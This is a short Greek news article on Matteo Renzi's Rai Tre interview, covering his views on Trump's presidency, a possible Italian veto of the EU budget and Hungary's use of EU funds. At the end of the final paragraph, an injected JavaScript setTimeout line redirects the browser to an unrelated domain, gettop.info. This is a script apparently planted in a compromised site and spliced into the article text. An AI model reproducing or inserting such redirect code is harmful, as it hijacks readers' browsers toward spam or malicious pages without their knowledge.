Ρέντσι: Διαφορετικός ο Τραμπ πρόεδρος από τον Τραμπ υποψήφιο

0
10

 

Σε συνέντευξή του στη Rai Tre ο Ιταλός πρωθυπουργός Ματέο Ρεντσι αναφέρθηκε στον νέο πρόεδρο των ΗΠΑ Ντόναλντ Τραμπ σημειώνοντας πως «πιστεύω ότι ο Τραμπ πρόεδρος θα είναι διαφορετικός από τον Τραμπ υποψήφιο».

«Ο Τραμπ κατάφερε να ερμηνεύσει την αλλαγή με πιο ριζικό τρόπο από τη Χίλαρι Κλίντον. Ο κόσμος επιλέγει την αλλαγή, αν και ορισμένες φορές, η αλλαγή αυτή προκαλεί έναν κάποιο φόβο», συμπλήρωσε ο Ρέντσι και επίσης επεσήμανε πως «ό,τι συμβαίνει στην Αμερική δεν μετατρέπεται, αυτόματα, σε νίκη της Μαρίν Λε Πεν στη Γαλλία ή του Μπέπε Γκρίλο στην Ιταλία».

Αναφερόμενος στην Ευρωπαϊκή Ένωση, ο Ρέντσι επανέλαβε ότι «αν χρειασθεί, η Ιταλία θα θέσει βέτο στον επόμενο προϋπολογισμό της ΕΕ», αν και «δεν είναι κάτι που θέλει να το πράξει» και υπογράμμισε ότι «το Σύμφωνο Σταθερότητας δεν μπορεί να αφορά την αντισεισμική θωράκιση των σχολείων» όπως και ότι «χώρες σαν την Ουγγαρία δεν μπορούν να χρησιμοποιούν τα κονδύλια με τα οποία η Ιταλία στηρίζει την Ένωση, για ιδεώδη που η Ρώμη δεν συμμερίζεται». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here